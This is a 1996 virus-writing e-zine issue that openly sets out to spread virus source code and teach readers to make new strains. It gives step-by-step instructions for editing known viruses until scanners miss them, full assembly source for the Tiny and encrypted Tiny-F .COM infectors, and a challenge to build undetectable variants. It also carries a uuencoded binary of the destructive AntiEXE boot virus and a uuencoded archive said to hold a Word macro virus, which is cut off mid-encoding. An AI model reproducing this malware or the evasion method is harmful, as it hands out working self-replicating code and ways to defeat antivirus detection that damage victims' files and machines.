Copy Link
Add to Bookmark
Report
Virus Bits and Bytes Issue 1
Virus Bits & Bytes Issue 1 June 1 1996
------------------
INDEX
-----
000 - You're reading it!
001 - Why am I doing this?
002 - Modifying virii to get past scan. (Taken from 40Hex)
003 - This issues Virus Challange.
004 - Who was that asshole? And AntiEXE Virus!
005 - Application form for VBB
006 - The Color Macro Virus
007 - EXTRA! The Doom II Virus!
008 - Virus News! A List of Virii in the Wild
CREDITS:
Dark Night(moi!) - Editor, co-editor, virus supply, news,
distibution....(well you get the point) Why Am I Doing This?
Hi! Have you ever wondered why the hell somebody would sit down
just to make a mag for other people to read and to enjoy
(maybe learn :-)) Well, I'm not profitting of of this work, but
at least I'm helping the world of virii programming different and
more interesting! The goal of this mag is to supply you with source,
played out virus code and hints on how to program (modify, etc)
virii. That's why I'm doing this. TO bring life into the virus
community, to see some action.
Help Wanted!!!!
Ok, I'll admit it right now. This mag isn't going to survive long
if I don't get anybody to help me and to collect some news. I don't
have the time nor do I feel like writing this mag on my own. So if
you want to help send some mail to 101546.2222@compuserve.com.
Greets!
Hi to all you virus programmers out there! Also greets to Godarky
who owns a nice little page of virus source code on the Web. Also
special greets to VLAD whoose Win95 virus "Bizatch" I feature in this
mag.
DN - HOW TO MODIFY A VIRUS SO SCAN WON'T CATCH IT -
OR
HOW TO CREATE NEW VIRUS STRAINS
The problem with most viruses is that this dickhead who lives in California
named John Mcafee gets his greedy hands on them and turns them into big
bucks -- for him. John boy is the reason there are over 500 viruses out
there, and I wouldn't doubt if he weren't resposible for writing at least
ten of them.
So the best thing to do to some Mcafee dependant sucker, or lame board is
this.
Say you have a copy of a played out virus, lets say an older one like
Armstand or Jerusalem. Almost every virus scanner can detect these
viruses cause they been around so long. Now heres a quick way to modify
viruses so the scanners wont catch them, in turn making them new strains.
The tools you need are --
Norton Utilites (or a good hex-editor)
Debug and/or
Turbo Debugger by Borland
Now heres what you do.
Step A
------
Make a target file like this with Debug
Copy the below file with your editor to a file called SAMPLE.USR
-------------------------------------------------------------------------------
n sample.com
a
int 20
rcx
2
w
q
------------------------------------------------------------------------------
Then uses Debug to make the file SAMPLE.COM executing this command --
DEBUG < SAMPLE.USR
This will make a two byte called SAMPLE.COM
STEP B
------
Infect the file with the virus. If this is a boot sector virus your on
your own. Do whatever you have to to infect the two byte file.
Make a copy of the file and keep it for safe keeping.
STEP C
------
Load up DISKEDIT, which comes with Norton 6.0 (I'm not sure if its in the
lower versions) PCTOOLS Hex Editor will work too but it takes more work.
Now have DISKEDIT Hex-edit the infected file.
Now figure out where the middle of the file is. Next put block on and
go to the end of the file. At the end of the file go to the edit screen and
select fill. Fill the lower half of the file will nonsense characters, its
good to select 255d (FFh) the blank character.
Now save your changes and go to DOS
Now use SCAN to scan the file for viruses. If it detects the virus you
didnt delete the search string that SCAN is searching for. Get it???
You see all SCAN does is search files for strings that are related to viruses.
For example if SCAN was looking for CASCADE it look for something like this-
EB1DAD1273D1FF121F
In every file you specify. So what we are doing is narrowing down where that
string is in the virus that SCAN keeps finding.
So what you have to do is keep deleting parts of the virus with DISKEDIT
untill you finally narrow down the string.
Keep this in mind, search strings are in the first 150 bytes of the file
about 75% of the time.
Ok lets say you narrowed down the search string and lets say it's -
B8 92 19 B7 21 CD
It will most likly be longer but this an example.
Now back to DEBUG - Do the following--
DEBUG
E 0100 b8 92 19 b7 21 cd -- this is the string you found
Then type --
U
This will give you a unassembled look at what the id-string is. In this
example it was
mov ax,1992h
mov bx,21h
int 21h
Now this is what you have to do, and keep in mind the following ---
THE FOLLOWING TAKES A SOMEWHAT KNOWING OF ASSEMBLER AND HOW IT WORKS!!!!!!
Uses Turbo Debugger to find the string, you can use DEBUG but I don't know
how to do this from debug.
Ok say you got the string on the screen --
mov ax,1992h
mov bh,21h
int 21h
Write down the locations in the file where these strings are. Ex 0100h etc..
Now rearrange the AX mov with the BX mov like this ---
mov bh,21h
mov ax,1992h
int 21h
You see? You didn't change the way the code functions (THATS IF YOU KNOW
WHAT YOUR DOING!) but you changed the codes id-string for SCAN.
Now since Turbo Debugger dosent let you save the changes you must do it
via - Debug.
DEBUG virus.com
a 0122 - This is the address of the string
Now enter the assembler instructions --
mov bh,21
mov ax,1992h
int 21h
w
q
Save it and SCAN it, if SCAN doesn't catch it Congrats. If it does ---
back to the lab. Oh well you get the point.
One warning, this only works with un-encrypting viruses, or on the
encryption mechanism of encrypting files (which will most likely be Scanned).
With that in mind, have fun.
HR Virus Challenge
---------------
This virus challenge goes right up to what I have included into
my mag at the beginning. I'm going to show you 2 copies of the
Tiny Virus(tiny and tiny-f). You can look at the changes made
and where the virus was improved.
So my challenge to you is to program a new strain of this virus
so that scan doesn't catch it**.
** You can send the SOURCE CODE to me if you want me to take a look
at it. Sorry I wont take com's or exe's! If you send me one they
will be deleted right away. Thanx!
Cut out here for Tiny
----------------------------------------------------------------------------
; Name: Tiny
; Aliases: 163 COM Virus, Tiny 163 Virus, Kennedy-163
; V Status: Rare
; Discovery: June, 1990
; Symptoms: COMMAND.COM & .COM file growth
; Origin: Denmark
; Eff Length: 163 Bytes
; Type Code: PNCK - Parasitic Non-Resident .COM Infector
; Detection Method: ViruScan V64+, VirexPC, F-Prot 1.12+, NAV, IBM Scan 2.00+
; Removal Instructions: Scan/D, F-Prot 1.12+, or Delete infected
files
; General Comments:
; The 163 COM Virus, or Tiny Virus, was isolated by Fridrik Skulason
; of Iceland in June 1990. This virus is a non-resident generic
; .COM file infector, and it will infect COMMAND.COM.
;
; The first time a file infected with the 163 COM Virus is executed,
; the virus will attempt to infect the first .COM file in the
; current directory. On bootable diskettes, this file will normally
; be COMMAND.COM. After the first .COM file is infected,each time
; an infected program is executed another .COM file will attempt to
; be infected. Files are infected only if their original length is
; greater than approximately 1K bytes.
;
; Infected .COM files will increase in length by 163 bytes, and have
; date/time stamps in the directory changed to the date/time the
; infection occurred. Infected files will also always end with this
; hex string: '2A2E434F4D00'.
;
; This virus currently does nothing but replicate, and is the
; smallest MS-DOS virus known as of its isolation date.
;
; The Tiny Virus may or may not be related to the Tiny Family.
; ^like she'd know the difference!
;
;-----------------------------------------------------------------------------
PAGE 59,132
data_2e equ 1ABh ;start of virus
seg_a segment byte public ;
assume cs:seg_a, ds:seg_a ;assume cs, ds - code
org 100h ;orgin of all COM files
s proc far
start:
jmp loc_1 ;jump to virus
;this is a replacement for an infected file
db 0CDh, 20h, 7, 8, 9 ;int 20h
;pop es
loc_1:
call sub_1 ;
s endp
sub_1 proc near ;
pop si ;locate all virus code via
sub si,10Bh ;si, cause all offsets will
mov bp,data_1[si] ;change when virus infects
add bp,103h ;a COM file
lea dx,[si+1A2h] ;offset of '*.COM',0 - via SI
xor cx,cx ;clear cx - find only normal
;attributes
mov ah,4Eh ;find first file
loc_2:
int 21h ;
jc loc_6 ;no files found? then quit
mov dx,9Eh ;offset of filename found
mov ax,3D02h ;open file for read/write access
int 21h ;
mov bx,ax ;save handle into bx
mov ah,3Fh ;read from file
lea dx,[si+1A8h] ;offset of save buffer
mov di,dx ;
mov cx,3 ;read three bytes
int 21h ;
cmp byte ptr [di],0E9h ;compare buffer to virus id
;string
je loc_4 ;
loc_3:
mov ah,4Fh ;find the next file
jmp short loc_2 ;and test it
loc_4:
mov dx,[di+1] ;lsh of offset
mov data_1[si],dx ;
xor cx,cx ;msh of offset
mov ax,4200h ;set the file pointer
int 21h ;
mov dx,di ;buffer to save read
mov cx,2 ;read two bytes
mov ah,3Fh ;read from file
int 21h ;
cmp word ptr [di],807h ;compare buffer to virus id
je loc_3 ;same? then find another file
;heres where we infect a file
xor dx,dx ;set file pointer
xor cx,cx ;ditto
mov ax,4202h ;set file pointer
int 21h ;
cmp dx,0 ;returns msh
jne loc_3 ;not the same? find another file
cmp ah,0FEh ;lsh = 254???
jae loc_3 ;if more or equal find another file
mov ds:data_2e[si],ax ;point to data
mov ah,40h ;write to file
lea dx,[si+105h] ;segment:offset of write buffer
mov cx,0A3h ;write 163 bytes
int 21h ;
jc loc_5 ;error? then quit
mov ax,4200h ;set file pointer
xor cx,cx ;to the top of the file
mov dx,1 ;
int 21h ;
mov ah,40h ;write to file
lea dx,[si+1ABh] ;offset of jump to virus code
mov cx,2 ;two bytes
int 21h ;
;now close the file
loc_5:
mov ah,3Eh ;close file
int 21h ;
loc_6:
jmp bp ;jump to original file
data_1 dw 0 ;
db '*.COM',0 ;wild card search string
sub_1 endp
seg_a ends
end start
----------------------------------------------------------------------------
The Tiny-F Strain made by DA
Cut Here!
----------------------------------------------------------------------------
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
ORG 100h
DOS EQU 21h
start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog
;-----------------------------------------------------------------------------
; nonencrypted subroutines start here
;-----------------------------------------------------------------------------
; PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
; Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
; New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ; DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop
POP SI ; restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT DOS ; do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ; error, bug out
RET
outa1:
JMP exit
;-----------------------------------------------------------------------------
; Unencrypted routines end here
;-----------------------------------------------------------------------------
realprog:
CLD ; forward direction for string ops
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
; Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ; Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h
LEA DX,[SI+fspec] ; get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ; no more files found, terminate virus
; Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
; (offset 30 is DTA filename start)
MOV AX,3D02H ; open file
INT DOS ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer
MOV CX,0003H ; read 3 bytes
INT DOS ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ; get date function
INT DOS ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
; Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT DOS ; do it!
MOV DX,DI ; set dest index to area for buffer
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT DOS ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
getaval: ; encryption routine starts here
; My modifications here - Dark Angel
MOV AH, 2Ch ; DOS get TIME function
INT DOS ; do it!
OR DX, DX ; Is it 0?
JE getaval ; yeah, try again
MOV word ptr [si+offset en_val], DX ; Store it
; Tighter code here - Dark Angel
XOR DX,DX ; clear regs
XOR CX,CX ; " "
MOV AX,4202H ; move file pointer
INT DOS ; do it!
OR DX,DX ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
CALL nfect
MOV AX,4200H ; move pointer
XOR CX, CX ; clear reg
MOV DX,OFFSET 00001 ; where to set pointer
INT DOS ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
MOV CX,0002H ; two bytes (the JMP)
INT DOS ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT DOS ; do it!
exit:
MOV AH,3EH ; close file
INT DOS ; do it!
; Return DTA to old position - Dark Angel
MOV AH, 1Ah ; Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h
JMP BP
;-----------------------------------------------------------------------------
; encrypted data goes here
;-----------------------------------------------------------------------------
fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ; Program identification
DB 'Dark Angel' ; author identification
DB 'Released 10-19-91' ; release date
endenc LABEL BYTE ; end of encryption zone
;-----------------------------------------------------------------------------
; nonencrypted data goes anywhere after here
;-----------------------------------------------------------------------------
blnkdat LABEL WORD
DW 0000H
; Only en_val is needed now because of new encryption mechanism
en_val DW 0h
endprog LABEL WORD
tinyv ENDS
END start
----------------------------------------------------------------------------
This is the end! Who was that Asshole?
---------------------
Well, the story is this. I was at school sitting in the
Computer Lab, hacking the network :-) when suddenly I noticed
this directory called virus on the harddrive. This made me
curious. I checked, and inside the directory there was an
AV program called Dr. Web. I ran the Program and it detected the
AntiEXE virus in memory and in the Boot Sector. So I copied the
prog. thinking this might be useful. Then at home I scanned my
computer and I also found the AntiEXE infection. But to my surprise
the virus had just trashed a few exe files on my HD. That was the
second that I realised that I must have gotten this virus of of
the school computer from some asshole who didn't know what he
was doing or did it on purpose. BY now I have figured out the
guy's name and E-Mail address. I will gladly send it to you if
you want. For this issue I have included the COM of the
virus(uuencoded*) and a description of it. I will support anybody who wants
to make a new strain of this virus, etc. But remember, don't make
the virus do any more damage then it does already, because I usually
don't support malacious coding.
Well, here it is:
The AntiEXE Virus
Description(info stolen from Stiller Research):
AntiEXE
Aliases: D3
Synopsis: Destructive, resident DOS boot sector and partition sector virus<br>
Damage: Inadvertent damage to diskette files and deliberate damage to .EXE files<br>
Symptoms: Damaged files, less total memory and PC hangs<br>
Details:
AntiEXE deliberately damages .EXE files by changing the first byte of
the file. Like Stoned, it will cause damage to any infected floppy
that contains more than just a few files. This virus is memory
resident and will infect any floppy accessed. AntiEXE remaps the disk
interrupt (Int 13h) to avoid resident monitoring programs but has no
stealth capabilities.
* UUencoding and decoding program included with this issue!
Cut Out Here
---------------------------------------------------------------------------
begin 644 antiexe.com
MZ10!30,``5,U+C```@(!``)P`-`"_0(`"0`"````35I``(@!-P_@@/SY=%(N
MHP<`S=-R2IPN@#X(``)U0%%65QXKR8[9]@9L!`-T(`X?B_N--AX`N0@`5_.F
M7W0.@<<``B[^#@<`=>CK`I"J'U]>68/Y`74(@/X`=0/H!`"=R@(`4%-14AX&
M5E<&'RZA```[!W48+J$"`#M'`G4/BX\$`(JW!@"X`0+-T^MC@/H!=UZ+1Q;V
M9Q`#1PY2L02+5Q'3Z@/"2(M/&%'1X2O2]_%94(O"*]+W\8KPBLI8BNC^P5B*
MT"Z(-@8`+HD.!`"X`0/-TW(;#@?\OP<`B_,#][D7`/.DN`$#,]NY`0`J]LW3
M7UX''UI96UC#,_^.W\063`")%DP#C`9.`_J.U[X`?(OF^QY65J$3!$BC$P2Q
M!M/@CL"C3@#'!DP`)P!0N%4!4+D``?SSI<LSP([`S=,.'[@!`EN+#@0`@_D-
M=0:Z@`#-T\LKTHHV!@#-TW+U#@>X`0*[``*Y`0"Z@`#-TW+C,_:M.P=U!JT[
M1P)TUKD-`(D.!`"X`0-0S=-8<L:^O@._O@&Y(0#SI4$KVX@V!@#-T\N``0$`
M!`.:91H```!6^0``````````````````````````````````````````````
1````````````````````5:H`
`
end
----------------------------------------------------------------------------
So take a look at the prog and try to find the search-string and change it. VBB Aplication
--------------
This aplication for the VIrus Bits & Bytes group gives you 2 options.
You can join as an active virus programmer and a full club
member(preferrred) or just as a editor, virus supplier, etc. for
this mag. Just please apply!
THIS GROUP IS NOT ILLEGAL!
SEND THIS APPLICATION TO 101546.2222@COMPUSERVE.COM
---------------------------------------------------------------------------
* = OPTIONAL ENTRY
PERSONAL INFO:
*REAL NAME: ______________________________
CALLSIGN: ______________________________
E-MAIL ADDRESS: ______________________________
CONTRIBUTIONS & QUESTIONS:
WHY DO YOU WANT TO BE A MEMBER OF VBB?
WHAT KIND OF MEMBERSHIP WOULD YOU LIKE? CHECK ALL THAT APPLY!
[ ] MAG HELP [ ]VIRUS PROGRAMMING, ETC.
DO YOU HAVE YOUR OWN HOMEPAGE?
WOULD YOU BE WILLING TO SUPPORT FUTURE ISSUES OF THIS MAG ON YOUR
HOMEPAGE?
---------------------------------------------------------------------------
Thanks for helping me! The Colors Macro Virus
----------------------
Well, as you probably know there is a (kind of)new virus around.
The word macro virus. Here at VBB were always busy investigating
new viral trends for you so that you'll be up to date. Well, here it
is: The colors macro virus in uue.
-----------------------------------------------------------------------------
begin 644 RAINBOWS.ZIP
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
